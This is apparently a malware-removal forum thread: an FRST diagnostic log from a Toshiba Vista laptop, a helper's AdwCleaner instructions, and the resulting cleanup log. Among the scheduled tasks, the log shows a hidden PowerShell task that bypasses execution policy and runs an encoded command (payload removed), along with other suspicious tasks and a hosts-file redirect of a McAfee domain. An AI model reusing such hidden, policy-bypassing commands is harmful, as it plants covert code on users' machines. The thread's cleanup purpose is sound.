TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.0.4.64 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM-x32\...\{D0387727-C89D-4774-B643-B9333EAA09DE}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.1.2.9 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.0.64.0 - TOSHIBA Corporation)
TOSHIBA Internal Modem Region Select Utility (HKLM-x32\...\InstallShield_{89F7D66C-777D-473B-AA11-319C0F190EAC}) (Version:  - )
Toshiba Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Disc Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.0.0.2 for x64 - TOSHIBA Corporation)
Toshiba Registration (HKLM-x32\...\{C53D16CC-E56F-47B8-906E-70AAF8EABB4F}) (Version: 1.00.0000 - Datalode Inc.)
Toshiba Resources Page (HKLM-x32\...\{21526716-DFD8-4B90-86D9-EF9F47057B3E}) (Version: 1.0.2.1 - TOSHIBA Corporation)
TOSHIBA SD Memory Utilities (HKLM\...\{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}) (Version: 1.9.1.12 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version:  - Agere Systems)
TOSHIBA Speech System Applications (HKLM-x32\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version:  - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM-x32\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM-x32\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM-x32\...\{A208044D-A88B-4ACF-AE95-E4F213E6EDC0}) (Version: 2.00.02 - TOSHIBA Corporation)
TOSHIBA USB Sleep and Charge Utility (HKLM-x32\...\{E487EE7D-EAAA-4E2A-9116-E3B477D8A74F}) (Version: 1.2.1.0 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.2.8.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.0.1.8 - TOSHIBA Corporation)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Webroot AntiVirus with Spy Sweeper (HKLM-x32\...\{1FCC574F-AFA2-4432-9EF1-79CA7BA73431}_is1) (Version: 6.1 - Webroot Software, Inc.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.66 - WildTangent)
Windows Driver Package - TOSHIBA (FwLnk) System  (11/19/2006 1.0.0.3) (HKLM\...\D27D7E9318CFA89EDDE8D448B507A8EB725F5A52) (Version: 11/19/2006 1.0.0.3 - TOSHIBA)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F85781D-2C97-4D9D-9632-7EFDBF2EB0A8} - \WebBarLaunchTask -> No File <==== ATTENTION
Task: {11DD6B62-185E-4E63-8F45-4FFC691C9B06} - \WebBarUpdateTask -> No File <==== ATTENTION
Task: {263A5680-836D-4B0F-BB3C-249E8B753F8E} - System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [2009-11-06] (Webroot Software, Inc.)
Task: {360E6CE9-8445-48AB-A36D-4F5A65A97683} - \DriverUpdate Startup -> No File <==== ATTENTION
Task: {3A51EE16-6E79-450D-A8FD-2A0BD34DFD95} - System32\Tasks\PubMach138 => C:\Users\Barbara\AppData\Local\RustiSens806\Rutransform.exe [2016-01-23] ()
Task: {4D77D01E-DB5F-4653-8377-E8C2AB310C52} - \Scheduled Update for Ask Toolbar -> No File <==== ATTENTION
Task: {79092768-F5C7-4D08-B1B7-9C7A7A0F414F} - System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64-encoded payload removed]
Task: {81FDB296-4C8A-4B83-A959-123B2D5E60D2} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {9858409A-6BF2-406E-B2D7-4793E237FFF1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {A4D38401-1428-46C7-AD2C-73A09F16C38F} - \DriverUpdate Scan -> No File <==== ATTENTION
Task: {A5190072-4239-4907-9D98-7871BD0DDBB9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {AE8343D2-863F-44E2-8FAE-B123C5BA930C} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: {B9545D91-42EE-4132-B2FA-A6D10D25BE8A} - \One System Care Task -> No File <==== ATTENTION
Task: {BB42D120-21AC-4A10-8D46-C325D413A0DF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C02F531F-476C-495D-BFA2-503EB2277BDB} - System32\Tasks\Brooucnejo => C:\ProgramData\Brooucnejo\1.0.7.1\semsikeh.exe
Task: {DB208AD7-F908-420A-8C84-CB29D9D5AF30} - \One System Care Monitor -> No File <==== ATTENTION
Task: {EA39D524-1CC9-4D84-86F5-6FC1F8939BAC} - \UpdateAdmin -> No File <==== ATTENTION
Task: {FC491F5B-D745-4FC7-A39F-466825B5D486} - System32\Tasks\OutstandinDivisio6 => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: {FF9497ED-7720-46DB-A12E-809C65F6789A} - \One System CarePeriod -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\OutstandinDivisio6.job => C:\Users\Barbara\AppData\Local\RustiSens806\Rureceive.exe
Task: C:\Windows\Tasks\PubMach138.job => C:\Users\Barbara\AppData\Local\RUSTIS~1\Rutransform.exe
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe>/ScheduleSweep=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A C:\BarbaraӖ眇扥潲瑯ӆTaskName=wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
ApplicationName=C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2007-09-06 12:27 - 2007-09-06 12:27 - 01331712 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2009-02-27 10:11 - 2009-02-27 10:11 - 00335360 _____ () C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2015-01-25 10:26 - 2006-01-12 09:24 - 00141312 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxcypp6c.dll
2014-11-18 01:04 - 2009-04-22 01:06 - 00120320 _____ () C:\Windows\system32\atitmm64.dll
2009-03-07 16:15 - 2009-03-07 16:15 - 06986552 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2008-07-14 13:35 - 2008-07-14 13:35 - 00107832 _____ () C:\Program Files\TOSHIBA\FlashCards\TWarnMsg\TWarnMsg.dll
2009-05-03 01:35 - 2007-04-23 11:09 - 00016896 _____ () C:\Program Files\TOSHIBA\Toshiba Assist\NotifyX.dll
2007-12-19 15:13 - 2007-12-19 15:13 - 00078848 _____ () C:\Program Files\TOSHIBA\HDD Protection\NotifyThp.dll
2009-03-12 22:08 - 2009-03-12 22:08 - 00048640 _____ () C:\Program Files (x86)\Toshiba\PCDiag\NotifyPCD.dll
2007-04-24 23:47 - 2007-04-24 23:47 - 00012288 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-02-10 14:32 - 2009-02-10 14:32 - 00076288 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00014848 _____ () C:\Windows\assembly\GAC_MSIL\AxInterop.WBOCXLib\1.0.0.0__90ba9c70f846762e\AxInterop.WBOCXLib.dll
2008-11-25 13:19 - 2008-11-25 13:19 - 01193472 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Implementation\64\wbocx.ocx
2009-01-30 13:41 - 2009-01-30 13:41 - 00016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2014-11-18 01:05 - 2014-11-18 01:05 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00868352 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMediaLibrary.dll
2009-02-16 19:09 - 2009-02-16 19:09 - 00007680 _____ () C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WRConsumerService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WebrootSpySweeperService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRConsumerService => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-05 21:16 - 2015-11-14 11:49 - 00000030 ____A C:\Windows\system32\Drivers\etc\hosts


0.0.0.1    mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\TOSHIBA-1.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{EFE7CF45-1DAA-444A-9D68-63305F72B7B9}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PowerCinema.exe
FirewallRules: [{80374A2A-F190-4E76-B229-C33B434E33CC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMService.exe
FirewallRules: [{1B9C4756-D936-4A65-8F71-23B96B9920E7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{A249412C-65ED-478F-A265-730F2670C0CB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\DMS\CLMSService.exe
FirewallRules: [{B7258A50-52F6-4718-AA9D-F64826CF7940}] => (Allow) LPort=80
FirewallRules: [{783ED446-2EB5-4D16-AA1E-E2891F07EE59}] => (Allow) LPort=80
FirewallRules: [{70403FF4-1D67-4D9B-B897-BA6F806EACA6}] => (Allow) LPort=80
FirewallRules: [{D2221019-1105-4A94-89C3-3937E8375ED2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{2C84BC51-F1B7-4BAB-ADBF-0543D8DF3E29}] => (Allow) LPort=2869
FirewallRules: [{D84264C9-3FEF-42B5-8D9F-11A47526CF13}] => (Allow) LPort=1900
FirewallRules: [{789E738D-DA66-4A05-B263-F7D8AFE251B2}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{9395CA26-0EC4-458B-ACD7-E1A49CC22B00}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{B7B911B3-E1A8-4E65-AFA0-AFCF782744C5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3F71D384-650E-4A4C-B0BE-0791DBAF9E52}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E8190506-4194-426F-9C00-B06D1C8072CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FF7A96AF-877F-41DF-B6A7-A5490ECE3775}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

06-09-2015 10:16:38 Windows Update
09-09-2015 11:00:57 Windows Update
10-09-2015 18:07:18 Windows Update
15-09-2015 07:55:18 Windows Update
18-09-2015 17:16:42 Windows Update
22-09-2015 14:11:34 Windows Update
26-09-2015 09:52:55 Windows Update
30-09-2015 10:34:26 Windows Update
03-10-2015 14:53:55 Windows Update
07-10-2015 17:52:14 Windows Update
11-10-2015 19:12:09 Windows Update
14-10-2015 19:51:23 Windows Update
15-10-2015 09:28:46 Windows Update
19-10-2015 11:40:48 Windows Update
22-10-2015 17:02:18 Windows Update
29-10-2015 19:01:20 Windows Update
03-11-2015 10:52:06 Windows Update
08-11-2015 11:52:57 Windows Update
12-11-2015 20:50:58 Windows Update
12-11-2015 21:46:25 Windows Update
16-11-2015 15:08:37 Windows Update
20-11-2015 19:26:46 Windows Update
27-11-2015 19:04:56 Windows Update
01-12-2015 12:15:00 Windows Update
04-12-2015 15:03:04 Windows Update
11-12-2015 12:52:52 Windows Update
14-12-2015 12:24:39 Windows Update
17-12-2015 18:42:37 Windows Update
26-12-2015 11:41:26 Windows Update
29-12-2015 21:04:35 Windows Update
03-01-2016 21:07:54 Windows Update
08-01-2016 18:16:31 Windows Update
16-01-2016 08:03:26 Windows Update
17-01-2016 11:42:08 Windows Update
21-01-2016 12:58:31 Windows Update
23-01-2016 18:29:26 Removed Ask Toolbar.
23-01-2016 18:35:35 Removed SlimCleaner Plus

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/26/2016 02:58:19 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:45:42 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/24/2016 02:39:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/23/2016 07:44:06 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 07:41:05 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 07:37:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (01/23/2016 07:36:49 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:31:13 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:28:04 PM) (Source: Microsoft-Windows-SpoolerSpoolss) (EventID: 1031) (User: NT AUTHORITY)
Description: 0x80072af9

Error: (01/23/2016 06:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (01/24/2016 03:48:50 AM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/24/2016 03:47:30 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: 30000Netman

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:55:37 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY59

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/24/2016 02:37:27 AM) (Source: ssidrv) (EventID: 26) (User: )
Description: Failed to set monitor event rule.

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 115.31.0.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608

Error: (01/23/2016 07:48:11 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.213.3845.0

    Update Source: %NT AUTHORITY51

    Update Stage: 4.8.0204.00

    Source Path: 4.8.0204.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608


CodeIntegrity:
===================================
  Date: 2016-01-26 03:07:09.097
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.847
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.629
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.395
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:08.005
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.771
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.521
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:07:07.287
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:06:33.544
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-26 03:06:33.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\ssidrv.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P7350 @ 2.00GHz
Percentage of memory in use: 39%
Total physical RAM: 4093.04 MB
Available physical RAM: 2493.93 MB
Total Virtual: 8361.36 MB
Available Virtual: 6564.87 MB

==================== Drives ================================

Drive c: (TI100343V0F) (Fixed) (Total:454.05 GB) (Free:335.04 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive e: (FCCJ TROY) (Removable) (Total:0.99 GB) (Free:0.98 GB) FAT

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 008CB0AA)
Partition 1: (Not Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Active) - (Size=454.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10.2 GB) - (Type=17)

========================================================
Disk: 1 (Size: 1010 MB) (Disk ID: 00661E17)
Partition 1: (Active) - (Size=1010 MB) - (Type=06)

==================== End of Addition.txt ============================


Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your Desktop.

  • Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan.
  • When finished, please click Cleaning.
  • Your PC should reboot now.
  • After reboot, a logfile will be opened. Copy its content into your next reply.
Note: Reports will be saved in your system partition, usually at C:\Adwcleaner

# AdwCleaner v5.031 - Logfile created 27/01/2016 at 03:13:36
# Updated 25/01/2016 by Xplode
# Database : 2016-01-25.3 [Local]
# Operating system : Windows Vista Home Premium Service Pack 2 (x64)
# Username : Barbara - BARBARA-PC
# Running from : C:\Users\Barbara\Desktop\AdwCleaner.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****

[-] Service Deleted : CouponPrinterService
[-] Service Deleted : swdumon

***** [ Folders ] *****

[#] Folder Deleted : C:\Program Files\PC Optimizer Pro
[#] Folder Deleted : C:\Program Files\WebBar
[#] Folder Deleted : C:\Program Files (x86)\Coupons
[#] Folder Deleted : C:\Program Files (x86)\driverupdate
[#] Folder Deleted : C:\Program Files (x86)\OneSystemCare
[#] Folder Deleted : C:\Program Files (x86)\Yahoo!\Companion
[#] Folder Deleted : C:\ProgramData\CrimeWatch
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Optimizer Pro
[#] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\FinanceAlert
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\StormWatch
[#] Folder Deleted : C:\Users\Barbara\AppData\Local\WebBar
[#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo! Companion
[#] Folder Deleted : C:\Users\Barbara\AppData\LocalLow\Yahoo!\Companion
[#] Folder Deleted : C:\Users\Barbara\AppData\Roaming\Yahoo!\Companion
[#] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\iac

***** [ Files ] *****

[-] File Deleted : C:\Windows\SysNative\drivers\swdumon.sys
[-] File Deleted : C:\Windows\SysWOW64\pmls.dll

***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKCU\Software\Classes\CLSID\{554EBE31-AEC1-4E34-BCE3-606467760D88}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{0FEB2313-F89B-4AC6-8153-84025604A06A}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{F8534A9F-4F29-4FDC-9CD9-023ACF0EF9B9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
